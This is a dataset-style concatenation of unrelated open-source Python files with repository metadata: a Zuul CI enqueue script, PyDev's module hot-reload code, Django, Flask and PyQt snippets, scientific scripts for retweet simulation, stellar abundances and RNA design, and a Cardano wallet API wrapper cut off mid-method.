# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import requests
import subprocess
import sys
if len(sys.argv) < 2:
print('Usage: zuul-test-repo repository [pipeline]')
sys.exit(1)
repo = sys.argv[1]
try:
pipeline = sys.argv[2]
except IndexError:
pipeline = 'test'
if repo.startswith('ext:'):
# Allow "ext:MassMessage" as shorthand
repos = ['mediawiki/extensions/' + repo.split(':', 1)[1]]
elif repo.startswith('file:'):
# Or entire files with "file:/home/foobar/list"
with open(repo.split(':', 1)[1]) as f:
repos = f.read().splitlines()
else:
repos = [repo]
def test_repo(repo):
# Fetch the latest change for the repo from the Gerrit API
r = requests.get('https://gerrit.wikimedia.org/r/changes/?'
'q=status:merged+project:%s&n=1&o=CURRENT_REVISION'
% repo)
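    # Gerrit prefixes its JSON responses with ")]}'" to prevent XSSI,
    # so skip the first four bytes before parsing.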
data = json.loads(r.text[4:])
if not data:
print('Error, could not find any changes in %s.' % repo)
sys.exit(1)
change = data[0]
change_number = change['_number']
patchset = change['revisions'][change['current_revision']]['_number']
print('Going to test %s@%s,%s' % (repo, change_number, patchset))
subprocess.call(['zuul', 'enqueue',
'--trigger', 'gerrit',
'--pipeline', pipeline,
'--project', repo,
'--change', '%s,%s' % (change_number, patchset)])
if __name__ == '__main__':
for repo in repos:
test_repo(repo)
|
[
"dzahn@wikimedia.org"
] |
dzahn@wikimedia.org
|
6ccc7f4bb583c7554918ac244ca1883a446d6583
|
8f2c55a2530c3e59dab5907c0044c618b88dd09b
|
/_pydevd_bundle/pydevd_reload.py
|
507e73be2481c064a04777f28cadb48cc7177f70
|
[
"Apache-2.0",
"EPL-1.0"
] |
permissive
|
fabioz/PyDev.Debugger
|
5a9c6d4c09be85a0e2d9fb93567fd65faf04c81d
|
26864816cbfcf002a99913bcc31ebef48042a4ac
|
refs/heads/main
| 2023-08-18T01:08:34.323363
| 2023-04-15T11:15:47
| 2023-04-15T11:15:47
| 21,870,144
| 363
| 126
|
Apache-2.0
| 2023-07-30T23:03:31
| 2014-07-15T18:01:12
|
Python
|
UTF-8
|
Python
| false
| false
| 15,773
|
py
|
"""
Based on the python xreload.
Changes
======================
1. we don't recreate the old namespace from new classes. Rather, we keep the existing namespace,
load a new version of it and update only some of the things we can inplace. That way, we don't break
things such as singletons or end up with a second representation of the same class in memory.
2. If we find it to be a __metaclass__, we try to update it as a regular class.
3. We don't remove old attributes (and leave them lying around even if they're no longer used).
4. Reload hooks were changed
These changes make it more stable, especially in the common case (where in a debug session only the
contents of a function are changed), besides providing flexibility for users that want to extend
on it.
Hooks
======================
Classes/modules can be specially crafted to work with the reload (so that it can, for instance,
update some constant which was changed).
1. To participate in the change of some attribute:
In a module:
__xreload_old_new__(namespace, name, old, new)
in a class:
@classmethod
__xreload_old_new__(cls, name, old, new)
A class or module may include a method called '__xreload_old_new__' which is called when we're
unable to reload a given attribute.
2. To do something after the whole reload is finished:
In a module:
__xreload_after_reload_update__(namespace):
In a class:
@classmethod
__xreload_after_reload_update__(cls):
A class or module may include a method called '__xreload_after_reload_update__' which is called
after the reload finishes.
Important: when providing a hook, always use the namespace or cls provided and not anything in the global
namespace, as the global namespace are only temporarily created during the reload and may not reflect the
actual application state (while the cls and namespace passed are).
Current limitations
======================
- Attributes/constants are added, but not changed (so singletons and the application state is not
broken -- use provided hooks to workaround it).
- Code using metaclasses may not always work.
- Functions and methods using decorators (other than classmethod and staticmethod) are not handled
correctly.
- Renamings are not handled correctly.
- Dependent modules are not reloaded.
- New __slots__ can't be added to existing classes.
Info
======================
Original: http://svn.python.org/projects/sandbox/trunk/xreload/xreload.py
Note: it seems https://github.com/plone/plone.reload/blob/master/plone/reload/xreload.py enhances it (to check later)
Interesting alternative: https://code.google.com/p/reimport/
Alternative to reload().
This works by executing the module in a scratch namespace, and then patching classes, methods and
functions in place. This avoids the need to patch instances. New objects are copied into the
target namespace.
"""
from _pydev_bundle.pydev_imports import execfile
from _pydevd_bundle import pydevd_dont_trace
import types
from _pydev_bundle import pydev_log
from _pydevd_bundle.pydevd_constants import get_global_debugger
NO_DEBUG = 0
LEVEL1 = 1
LEVEL2 = 2
DEBUG = NO_DEBUG
def write_err(*args):
py_db = get_global_debugger()
if py_db is not None:
new_lst = []
for a in args:
new_lst.append(str(a))
msg = ' '.join(new_lst)
s = 'code reload: %s\n' % (msg,)
cmd = py_db.cmd_factory.make_io_message(s, 2)
if py_db.writer is not None:
py_db.writer.add_command(cmd)
def notify_info0(*args):
write_err(*args)
def notify_info(*args):
if DEBUG >= LEVEL1:
write_err(*args)
def notify_info2(*args):
if DEBUG >= LEVEL2:
write_err(*args)
def notify_error(*args):
write_err(*args)
#=======================================================================================================================
# code_objects_equal
#=======================================================================================================================
def code_objects_equal(code0, code1):
for d in dir(code0):
if d.startswith('_') or 'line' in d or d in ('replace', 'co_positions', 'co_qualname'):
continue
if getattr(code0, d) != getattr(code1, d):
return False
return True
#=======================================================================================================================
# xreload
#=======================================================================================================================
def xreload(mod):
"""Reload a module in place, updating classes, methods and functions.
mod: a module object
Returns a boolean indicating whether a change was done.
"""
r = Reload(mod)
r.apply()
found_change = r.found_change
r = None
pydevd_dont_trace.clear_trace_filter_cache()
return found_change
# This isn't actually used... Initially I planned to reload variables which are immutable on the
# namespace, but this can destroy places where we're saving state, which may not be what we want,
# so, we're being conservative and giving the user hooks if he wants to do a reload.
#
# immutable_types = [int, str, float, tuple] #That should be common to all Python versions
#
# for name in 'long basestr unicode frozenset'.split():
# try:
# immutable_types.append(__builtins__[name])
# except:
# pass #Just ignore: not all python versions are created equal.
# immutable_types = tuple(immutable_types)
#=======================================================================================================================
# Reload
#=======================================================================================================================
class Reload:
def __init__(self, mod, mod_name=None, mod_filename=None):
self.mod = mod
if mod_name:
self.mod_name = mod_name
else:
self.mod_name = mod.__name__ if mod is not None else None
if mod_filename:
self.mod_filename = mod_filename
else:
self.mod_filename = mod.__file__ if mod is not None else None
self.found_change = False
def apply(self):
mod = self.mod
self._on_finish_callbacks = []
try:
# Get the module namespace (dict) early; this is part of the type check
modns = mod.__dict__
# Execute the code. We copy the module dict to a temporary; then
# clear the module dict; then execute the new code in the module
# dict; then swap things back and around. This trick (due to
# Glyph Lefkowitz) ensures that the (readonly) __globals__
# attribute of methods and functions is set to the correct dict
# object.
new_namespace = modns.copy()
new_namespace.clear()
if self.mod_filename:
new_namespace["__file__"] = self.mod_filename
try:
new_namespace["__builtins__"] = __builtins__
except NameError:
                pass  # Ok if not there.
if self.mod_name:
new_namespace["__name__"] = self.mod_name
if new_namespace["__name__"] == '__main__':
# We do this because usually the __main__ starts-up the program, guarded by
# the if __name__ == '__main__', but we don't want to start the program again
# on a reload.
new_namespace["__name__"] = '__main_reloaded__'
execfile(self.mod_filename, new_namespace, new_namespace)
# Now we get to the hard part
oldnames = set(modns)
newnames = set(new_namespace)
# Create new tokens (note: not deleting existing)
for name in newnames - oldnames:
notify_info0('Added:', name, 'to namespace')
self.found_change = True
modns[name] = new_namespace[name]
# Update in-place what we can
for name in oldnames & newnames:
self._update(modns, name, modns[name], new_namespace[name])
self._handle_namespace(modns)
for c in self._on_finish_callbacks:
c()
del self._on_finish_callbacks[:]
except:
pydev_log.exception()
def _handle_namespace(self, namespace, is_class_namespace=False):
on_finish = None
if is_class_namespace:
xreload_after_update = getattr(namespace, '__xreload_after_reload_update__', None)
if xreload_after_update is not None:
self.found_change = True
on_finish = lambda: xreload_after_update()
elif '__xreload_after_reload_update__' in namespace:
xreload_after_update = namespace['__xreload_after_reload_update__']
self.found_change = True
on_finish = lambda: xreload_after_update(namespace)
if on_finish is not None:
# If a client wants to know about it, give him a chance.
self._on_finish_callbacks.append(on_finish)
def _update(self, namespace, name, oldobj, newobj, is_class_namespace=False):
"""Update oldobj, if possible in place, with newobj.
If oldobj is immutable, this simply returns newobj.
Args:
oldobj: the object to be updated
newobj: the object used as the source for the update
"""
try:
notify_info2('Updating: ', oldobj)
if oldobj is newobj:
# Probably something imported
return
if type(oldobj) is not type(newobj):
# Cop-out: if the type changed, give up
if name not in ('__builtins__',):
notify_error('Type of: %s (old: %s != new: %s) changed... Skipping.' % (name, type(oldobj), type(newobj)))
return
if isinstance(newobj, types.FunctionType):
self._update_function(oldobj, newobj)
return
if isinstance(newobj, types.MethodType):
self._update_method(oldobj, newobj)
return
if isinstance(newobj, classmethod):
self._update_classmethod(oldobj, newobj)
return
if isinstance(newobj, staticmethod):
self._update_staticmethod(oldobj, newobj)
return
if hasattr(types, 'ClassType'):
classtype = (types.ClassType, type) # object is not instance of types.ClassType.
else:
classtype = type
if isinstance(newobj, classtype):
self._update_class(oldobj, newobj)
return
# New: dealing with metaclasses.
if hasattr(newobj, '__metaclass__') and hasattr(newobj, '__class__') and newobj.__metaclass__ == newobj.__class__:
self._update_class(oldobj, newobj)
return
if namespace is not None:
# Check for the `__xreload_old_new__` protocol (don't even compare things
# as even doing a comparison may break things -- see: https://github.com/microsoft/debugpy/issues/615).
xreload_old_new = None
if is_class_namespace:
xreload_old_new = getattr(namespace, '__xreload_old_new__', None)
if xreload_old_new is not None:
self.found_change = True
xreload_old_new(name, oldobj, newobj)
elif '__xreload_old_new__' in namespace:
xreload_old_new = namespace['__xreload_old_new__']
xreload_old_new(namespace, name, oldobj, newobj)
self.found_change = True
# Too much information to the user...
# else:
# notify_info0('%s NOT updated. Create __xreload_old_new__(name, old, new) for custom reload' % (name,))
except:
notify_error('Exception found when updating %s. Proceeding for other items.' % (name,))
pydev_log.exception()
# All of the following functions have the same signature as _update()
def _update_function(self, oldfunc, newfunc):
"""Update a function object."""
oldfunc.__doc__ = newfunc.__doc__
oldfunc.__dict__.update(newfunc.__dict__)
try:
newfunc.__code__
attr_name = '__code__'
except AttributeError:
newfunc.func_code
attr_name = 'func_code'
old_code = getattr(oldfunc, attr_name)
new_code = getattr(newfunc, attr_name)
if not code_objects_equal(old_code, new_code):
notify_info0('Updated function code:', oldfunc)
setattr(oldfunc, attr_name, new_code)
self.found_change = True
try:
oldfunc.__defaults__ = newfunc.__defaults__
except AttributeError:
oldfunc.func_defaults = newfunc.func_defaults
return oldfunc
def _update_method(self, oldmeth, newmeth):
"""Update a method object."""
# XXX What if im_func is not a function?
if hasattr(oldmeth, 'im_func') and hasattr(newmeth, 'im_func'):
self._update(None, None, oldmeth.im_func, newmeth.im_func)
elif hasattr(oldmeth, '__func__') and hasattr(newmeth, '__func__'):
self._update(None, None, oldmeth.__func__, newmeth.__func__)
return oldmeth
def _update_class(self, oldclass, newclass):
"""Update a class object."""
olddict = oldclass.__dict__
newdict = newclass.__dict__
oldnames = set(olddict)
newnames = set(newdict)
for name in newnames - oldnames:
setattr(oldclass, name, newdict[name])
notify_info0('Added:', name, 'to', oldclass)
self.found_change = True
# Note: not removing old things...
# for name in oldnames - newnames:
# notify_info('Removed:', name, 'from', oldclass)
# delattr(oldclass, name)
for name in (oldnames & newnames) - set(['__dict__', '__doc__']):
self._update(oldclass, name, olddict[name], newdict[name], is_class_namespace=True)
old_bases = getattr(oldclass, '__bases__', None)
new_bases = getattr(newclass, '__bases__', None)
if str(old_bases) != str(new_bases):
notify_error('Changing the hierarchy of a class is not supported. %s may be inconsistent.' % (oldclass,))
self._handle_namespace(oldclass, is_class_namespace=True)
def _update_classmethod(self, oldcm, newcm):
"""Update a classmethod update."""
# While we can't modify the classmethod object itself (it has no
# mutable attributes), we *can* extract the underlying function
# (by calling __get__(), which returns a method object) and update
# it in-place. We don't have the class available to pass to
# __get__() but any object except None will do.
self._update(None, None, oldcm.__get__(0), newcm.__get__(0))
def _update_staticmethod(self, oldsm, newsm):
"""Update a staticmethod update."""
# While we can't modify the staticmethod object itself (it has no
# mutable attributes), we *can* extract the underlying function
# (by calling __get__(), which returns it) and update it in-place.
# We don't have the class available to pass to __get__() but any
# object except None will do.
self._update(None, None, oldsm.__get__(0), newsm.__get__(0))
|
[
"fabiofz@gmail.com"
] |
fabiofz@gmail.com
|
77e3a3bf9a976c804784f6bbc248d5188678a70b
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_fawn.py
|
260afb89b3b0bae13a38db08457adb7aad8566e8
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
# class header
class _FAWN():
def __init__(self,):
self.name = "FAWN"
self.definitions = [u'a young deer', u'a pale yellowish-brown colour']
self.parents = []
        self.children = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
45403bc3673f7fdd17f2e29878219415405ea12a
|
9e538305f9263d86e780a4a3f205c972f658f54d
|
/src/order/models/managers.py
|
7b7538f837adf7cf43e89ce2fef561ffcab76f9c
|
[] |
no_license
|
tanjibpa/mednet
|
bb188582b0d90407015622b34f0291557acb1919
|
19a7535d583077fec7b7030c298fceb4c4df3207
|
refs/heads/main
| 2023-05-26T07:44:27.615506
| 2021-06-10T06:30:19
| 2021-06-10T06:30:19
| 355,774,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
from django.db import models
class SupplierOrderList(models.Manager):
def supplier_order(self):
return super().get_queryset().filter(producer__org_type="supplier")
|
[
"ikram.tanjib@gmail.com"
] |
ikram.tanjib@gmail.com
|
db87634dbf1ae027564cb30f9a51121feedec819
|
9d3ec78e89bd3352fc037c338c6c741a2baf88d1
|
/projectrepair/models/shop_model.py
|
57872549a4f7aedfd85c1870ea1215e9d39e5900
|
[] |
no_license
|
suhas7reddy/IBHAckathon-Repair-28
|
7842b62f67cfd7e52db541433e7bd8e96b1a3c6b
|
ce0f838a16afa0dacea52a5cecdc6200356f6118
|
refs/heads/master
| 2022-01-21T20:31:53.688141
| 2019-07-22T18:57:23
| 2019-07-22T18:57:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,091
|
py
|
from flask import Flask
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from werkzeug.security import generate_password_hash, check_password_hash
engine = create_engine("mysql+pymysql://starlord:qwerty@127.0.0.1/toufique?host=localhost&port=3306", echo=True)
Base = declarative_base()
from sqlalchemy import Column, Integer, String
class Shop(Base):
__tablename__ = 'shop'
id = Column(Integer, primary_key=True)
lati = Column(String)
longi = Column(String)
emailid = Column(String)
phnno=Column(Integer)
city=Column(String)
state=Column(String)
password=Column(String(128)) ## this must be hashed
rating=Column(Integer)
def __repr__(self):
return "something"#"<Shop(lati='%s', ='%s', nickname='%s')>" % (self.name, self.fullname, self.nickname)
def selectAll(self):
conn=engine.connect()
res=conn.execute("select * from shop")
lis=res.fetchall()
ret={}
for i in lis:
k=i[0]
v=i[1:]
ret[k]=v
return ret
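# A minimal sketch of using the werkzeug helpers imported above so the password
# column stores a hash rather than plain text (variable names illustrative):
#
#     hashed = generate_password_hash(plain_password)
#     shop = Shop(password=hashed)
#     ...
#     ok = check_password_hash(shop.password, candidate_password)  # True/False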
|
[
"palashsk2.sk@live.com"
] |
palashsk2.sk@live.com
|
9e29ecd5d2c63293fd57b88908b3776ca586eed6
|
921cc4c193089aac55e1f7a7b71f065529f82047
|
/example_simulation.py
|
2167ca29ac42e48063f5b16760f1378230282798
|
[
"MIT"
] |
permissive
|
zshwuhan/TiDeH
|
a4bd5dbf8eadf8ef8d0540cef3acc51d71a45104
|
23bc22f83925d06149933d715127d17819a62012
|
refs/heads/master
| 2023-03-16T20:59:19.433326
| 2020-12-30T09:39:40
| 2020-12-30T09:39:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,573
|
py
|
"""
This code generates a retweet dataset based on Time-Dependent Hawkes process (TiDeH).
Then, the model parameters are estimated from the dataset.
Inputs are
1) Model parameters of TiDeH (p_0, r_0, phi_0, t_m).
2) Observation time (= obs_time).
Outputs are
1) Estimate of model parameters of TiDeH (p_0, r_0, phi_0, t_m).
This code is developed by Sylvain Gauthier and Sebastian Rühl under the supervision of Ryota Kobayashi.
"""
from tideh.simulate import simulate_time_rescaling
from tideh.functions import infectious_rate_tweets
from tideh import load_events_vec
from tideh import estimate_parameters
# load pool of follower counts used for simulation from file
file_path = 'data/example/sample_file.txt'
_, (_, follower) = load_events_vec(file_path)
runtime = 48 # simulate for 2 days
# parameters of infectious rate
p0 = 0.001
r0 = 0.424
phi0 = 0.125
taum = 2.
# simulate
events = simulate_time_rescaling(runtime=runtime, p=lambda t: infectious_rate_tweets(t, p0, r0, phi0, taum),
follower_pool=follower[1:], int_fol_cnt=follower[0])
# estimate original infectious rate parameters
add_params = {'bounds': [(-1, 0.5), (1, 20.)]}
params, err, _ = estimate_parameters(events=events, obs_time=runtime, **add_params)
print("Estimated parameters are (actual value):")
print("p0: %.5f (%0.3f)" % (params[0], p0))
print("r0: %.5f (%0.3f)" % (params[1], r0))
print("phi0: %.5f (%0.3f)" % (params[2], phi0))
print("tm: %.5f (%0.3f)" % (params[3], taum))
print("Average %% error (estimated to fitted): %.2f" % (err * 100))
|
[
"sebaruehl@gmail.com"
] |
sebaruehl@gmail.com
|
4fb3594ea95eb143e256712a4f0ff5e30ff4aa43
|
4c6e41781679cd487283824609bd4133f22fae95
|
/gui/Experiment/groundStation/win_Home.py
|
d26fc9a653d65e1e6e252e3ee36e84a15a09b5f7
|
[] |
no_license
|
Rachmitah/Final-Project
|
4b65aaecf2158e2e3caf22b37176c4c23252c60c
|
52a71d9750b42e36c8e4c2ea9949d2d2c43aac48
|
refs/heads/master
| 2021-09-19T16:54:17.492266
| 2018-07-29T16:02:23
| 2018-07-29T16:02:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 893
|
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import QMainWindow, QAction, qApp, QApplication
from PyQt5.QtGui import QIcon
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
exitAction = QAction(QIcon('layout/ui-icons/32/close.png'), '&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(qApp.quit)
self.statusBar()
menubar = self.menuBar()
fileMenu = menubar.addMenu('&File')
fileMenu.addAction(exitAction)
self.setGeometry(300, 300, 300, 200)
self.setWindowTitle('Menubar')
self.show()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
|
[
"mangatkk@gmail.com"
] |
mangatkk@gmail.com
|
617c1aed9193403c0aede29ae9f4b16fbb7c1144
|
6c8e93ba0f2742c5cc59c4c0b03a04f3992619e2
|
/MOOGabund.py
|
b904b37cf359334f28140dd40da32da939bf0b6e
|
[] |
no_license
|
christinagilligan/MetalPoorStars
|
192aecd8ab803c222af4bfe59fffe1fa13df4c4f
|
5571c1cd0cbfa05434f593b7ad6ab77f9d1de667
|
refs/heads/master
| 2020-03-22T04:14:19.800174
| 2018-07-16T18:05:15
| 2018-07-16T18:05:15
| 139,483,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,002
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon May 7 15:07:30 2018
@author: christinagilligan
"""
#convert csv to a MOOG input file
import csv
import numpy as np
import matplotlib.pyplot as plt
ion=[]
wavelength=[]
eqwA=[]
eqwmA=[]
Notes=[]
extra1=[]
extra2=[]
extra3=[]
extra4=[]
extra5=[]
#change starname to whatever to make the file
starname='HIP106924'
filename=str(starname)+'abund.csv'
f = open(filename)
csv_f = csv.reader(f)
next(csv_f)
abund = np.array(list(csv_f))
ion=np.array(abund[:,0])
wavelength=np.array(abund[:,1],dtype=float)
eqwA=np.array(abund[:,2])
eqwmA=np.array(abund[:,3],dtype=float)
#need to find loggf and ep values for each wavelength
wavelength_all=[]
ep=[]
loggf=[]
# the file holds the Fe line list; skip header lines (which mention 'Fe' or 'Wavelength') and blanks
file = open('metalpoorfe.dat')
for line in file:
if 'Fe' not in line and 'Wavelength' not in line and len(line.strip())!=0:
line=line.strip()
line=line.split()
line=np.asarray(line)
wavelength_all.append(line[0])
ep.append(line[2])
loggf.append(line[3])
wavelength_all=np.asarray(wavelength_all)
file = open(str(starname)+'.dat','w')
file.write('Fe Lines in '+str(starname)+'\n')
for i in range(0,len(ion)-1):
if eqwmA[i]!= 0 and ion[i]=='FeI':
index=np.flatnonzero(float("{0:.2f}".format(wavelength[i])) == wavelength_all.astype(float))
loggf_value=loggf[index[0]]
ep_value=ep[index[0]]
file.write(' '+"{0:.2f}".format(wavelength[i])+' '+str(26.0)+' '+str(ep_value)+' '+str(loggf_value)+' '+str(eqwmA[i])+'\n')
if eqwmA[i]!= 0 and ion[i]=='FeII':
        index=np.flatnonzero(float("{0:.2f}".format(wavelength[i])) == wavelength_all.astype(float))
loggf_value=loggf[index[0]]
ep_value=ep[index[0]]
file.write(' '+"{0:.2f}".format(wavelength[i])+' '+str(26.1)+' '+str(ep_value)+' '+str(loggf_value)+' '+str(eqwmA[i])+'\n')
file.close()
|
[
"christinagilligan@gmail.com"
] |
christinagilligan@gmail.com
|
8f45cff222fbcf136ef6cdd1fe4f7f7808ae38d0
|
61e698839a4a355a26023542c3c277fa72a52387
|
/ZJU-Python/CH3/ch3-5.py
|
3ea059aa708f84d52ddd63ec89c09e3ff02ecce1
|
[] |
no_license
|
JiahuiQiu/Python-Learning
|
b51fd224bf3228b858d7dc5db76fd8852ebbee4a
|
9d704e51e2e9f3121117e9170e840e1df4879e0e
|
refs/heads/master
| 2021-04-16T18:11:37.903225
| 2021-02-11T06:38:10
| 2021-02-11T06:38:10
| 249,374,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 549
|
py
|
# -*- coding: utf-8 -*-
"""
字符转换
本题要求提取一个字符串中的所有数字字符('0'……'9'),将其转换为一个整数输出。
输入格式:
输入在一行中给出一个不超过80个字符且以回车结束的字符串。
输出格式:
在一行中输出转换后的整数。题目保证输出不超过长整型范围。
输入样例:
free82jeep5
输出样例:
825
"""
a = input()
s1 = ""
s2 = "0123456789"
for i in list(a):
if i in s2:
s1 += i
print(int(s1))
|
[
"noreply@github.com"
] |
noreply@github.com
|
57334a3b2339be3bc7d8390a3d7b5d968de8ed90
|
c6553cfb21edc9da3b441eb9b9e67eea47c42680
|
/top50check.py
|
6ad93e8843476253ec6d703c7c87558250448c69
|
[] |
no_license
|
vishruthvipra/spam-detector
|
c70315e34af6553ee45faa7a526d3a1e6198ac80
|
6a2f3fe2967468f438a5eb66caf00ec8bb93767e
|
refs/heads/master
| 2020-04-03T18:27:21.512856
| 2018-10-31T02:18:10
| 2018-10-31T02:18:10
| 155,484,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
TRIALA = '/Users/vishruthkrishnaprasad/Downloads/IR/ASSGN7/result/decision_tree_train_performance_trial_a'
TRIALB = '/Users/vishruthkrishnaprasad/Downloads/IR/ASSGN7/result/decision_tree_train_performance_trial_b'
OUTPUTTOTAL = '/Users/vishruthkrishnaprasad/Downloads/IR/ASSGN7/output_total'
def main():
f = open(TRIALA, "r")
score = 0
for line in f.readlines()[:50]:
_, _, grade, _ = line.split()
grade = float(grade)
score += grade
accuracy = score / 50 * 100
print "Accuracy for top 50 manual:", accuracy
f.close()
f = open(TRIALB, "r")
score = 0
for line in f.readlines()[:50]:
_, _, grade, _ = line.split()
grade = float(grade)
score += grade
accuracy = score / 50 * 100
print "Accuracy for top 50 spamwords:", accuracy
f.close()
f = open(OUTPUTTOTAL, "r")
allscores = []
score = 0
for line in f.readlines()[1:]:
_, grade, _ = line.split()
grade = float(grade)
allscores.append(grade)
newscores = sorted(allscores, reverse=True)
for grade in newscores[:50]:
score += grade
accuracy = score / 50 * 100
print "Accuracy for top 50 unigrams:", accuracy
f.close()
if __name__ == '__main__':
main()
|
[
"krishnaprasad.v@husky.neu.edu"
] |
krishnaprasad.v@husky.neu.edu
|
b7cbd5a455bd6dcba44b9d1f0d98e19cd9264524
|
86b670d48d6f497136c9386a6637bb2b4c35a655
|
/GenerateLibrary/generateScaffolds.py
|
c5928887f09126cf833bc80e7effaffe476616ab
|
[] |
no_license
|
nbisaria/RNAfold
|
11ff6ffc1792c8b998b3a28b1c3040fc694696b4
|
ed9828549a243b9d1a654c743ae392ebaba12737
|
refs/heads/master
| 2020-04-02T07:11:31.489686
| 2018-11-06T23:42:29
| 2018-11-06T23:42:29
| 154,185,399
| 0
| 0
| null | 2018-10-26T21:40:23
| 2018-10-22T17:22:21
|
Python
|
UTF-8
|
Python
| false
| false
| 2,805
|
py
|
import RNA
import subprocess
import pandas as pd
import imp
from random import random
imp.load_source("walkerrandom",("/lab/bartel1_ata/nbisaria/RNAfold/subfunctions/walkerrandom.py"))
from walkerrandom import Walkerrandom
from collections import defaultdict
imp.load_source("general",("/lab/bartel1_ata/nbisaria/RNAfold/subfunctions/general.py"))
from general import *
def GenerateRandomScaffAndLinker(n):
per_AU_scaff = 0.65
per_AU_linker = 0.85
len_scaff = 10
len_linker = 2
Scaffprob = dict( A=per_AU_scaff/2, U=per_AU_scaff/2, C=(1-per_AU_scaff)/2, G=(1-per_AU_scaff)/2 )
srand = Walkerrandom( Scaffprob.values(), Scaffprob.keys() )
Linkprob = dict( A=per_AU_linker/2, U=per_AU_linker/2, C=(1-per_AU_linker)/2, G=(1-per_AU_linker)/2 )
lrand = Walkerrandom( Linkprob.values(), Linkprob.keys())
numhits = 0
contexts_final = defaultdict()
seqsfilter = GetMotifstoFilter()
def makeSeqwProb(l,wrand):
s = ''
for i in range(0,l):
s = s + wrand.random()
return s
MS2 = Get_MS2()
PP7 = Get_PP7()
fivep, threep = GetFlankingseqs()
db_final = '......................(((((((.((((......)))))))))))))))))....................(((((((.((....))))))))).......................'
while numhits < n:
l1 = makeSeqwProb(len_linker, lrand)
l2 = makeSeqwProb(len_linker, lrand)
l3 = makeSeqwProb(len_linker, lrand)
l4 = makeSeqwProb(len_linker, lrand)
s1 = makeSeqwProb(len_scaff, srand)
s2 = makeSeqwProb(len_scaff, srand)
# right now R2 and revcomp(R1) makes a giant hairpin:
#'...(((....(((..(((((((((((((((((....)))))))))))).)))))..)))...))).......'
# this is using the R2 + get_rc(R1)
# perhaps need to add a constant new sequence + BstX1 sites and use some dark cycles
# the library itself will have only a subset of R2 (or all of R2 depending on PCR and then we will add BstXI sites using PCR)
seq_final = fivep + l1+PP7 + l2 +l3 + MS2 + l4 + threep
print(len(seq_final))
dG, db = GetdG_dotbracket(seq_final)
# constrain = db[0:3] + db[11:15] + db[22:25] + db[-3:] + db[-26:-22] + db[-14:-10]
# constrain = db[0:3] + db[11:15] + db[-3:] + db[-14:-10]
print(dG,db)
# print(db)
if (dG > -25.6) and not any(motif in seq_final for motif in seqsfilter):
# if (db == db_final) and not any(motif in seq_final for motif in seqsfilter):
print(seq_final)
print(dG, db)
numhits = numhits + 1
contexts_final['c' + str(numhits)] = [l1,PP7, l2, l3, MS2, l4]
return contexts_final
def main():
n=10
c_final = GenerateRandomScaffAndLinker(n)
print(c_final)
if __name__ == "__main__":
main()
|
[
"nbisaira@gmail.com"
] |
nbisaira@gmail.com
|
2f956f1da85659a14cb9e78cec49ba3da20a8935
|
bf9f01c390ba5e1448c461d4e22c404cddf30ddd
|
/cardano_wrapper/wrappers/WalletWrap.py
|
a0e4d569a9c8249c3826c4090aa08b8f769ffe41
|
[] |
no_license
|
Mercurial/cardano-wrapper
|
0f25251570d057b8dad483f1484d563aea875123
|
0c5c89848e42e15deadb13e657063070bc620d3d
|
refs/heads/main
| 2023-05-09T06:35:55.542452
| 2021-05-27T04:55:19
| 2021-05-27T04:55:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,605
|
py
|
import json
import time
from os import path
import requests
import yaml
import subprocess
from cardano_wrapper.wrappers.AddressWrap import AddressWrap
from cardano_wrapper.utils import bcolors
class WalletWrap(object):
def __init__(self):
"""This object wraps the Cardano Wallet API so that we can use Python functionality
to recieve and send API endpoint requests.
"""
self.headers = {
"Accept": "application/json",
"Content-type": "application/json",
}
self.setup()
def setup(self, file="conf.yaml"):
conf_path = path.join(path.dirname(__file__), "../../conf.yaml")
with open(conf_path, "r") as stream:
conf = yaml.safe_load(stream)
self.server = conf.get("wallet_server")
if not self.server:
raise ValueError(
f"{bcolors.WARNING}Define server in `{file}`.{bcolors.ENDC}"
)
else:
print(f"Sending requests to {self.server}")
self.version = conf.get("wallet_version")
r = requests.get(f"{self.server}/{self.version}/network/information")
return r.raise_for_status()
def make_wallet_path(self, wallet_type):
"""[summary]
Args:
wallet_type (str): Either "shelley" or "byron".
Raises:
ValueError: Raised if the wallet is not "shelley" or "byron".
Returns:
str: Formatted `wallets` URL path.
"""
if wallet_type == "shelley":
return "wallets"
elif wallet_type == "byron":
print(
f"{bcolors.WARNING}Warning:{bcolors.ENDC} Since you're using Byron, there might be some errors. "
"The construction of random wallet in itself is deprecated, in particular "
"the restoration from an encrypted root private key. These endpoints exist "
"to ease migrations from legacy software such as cardano-sl but should be "
"avoided by new applications."
)
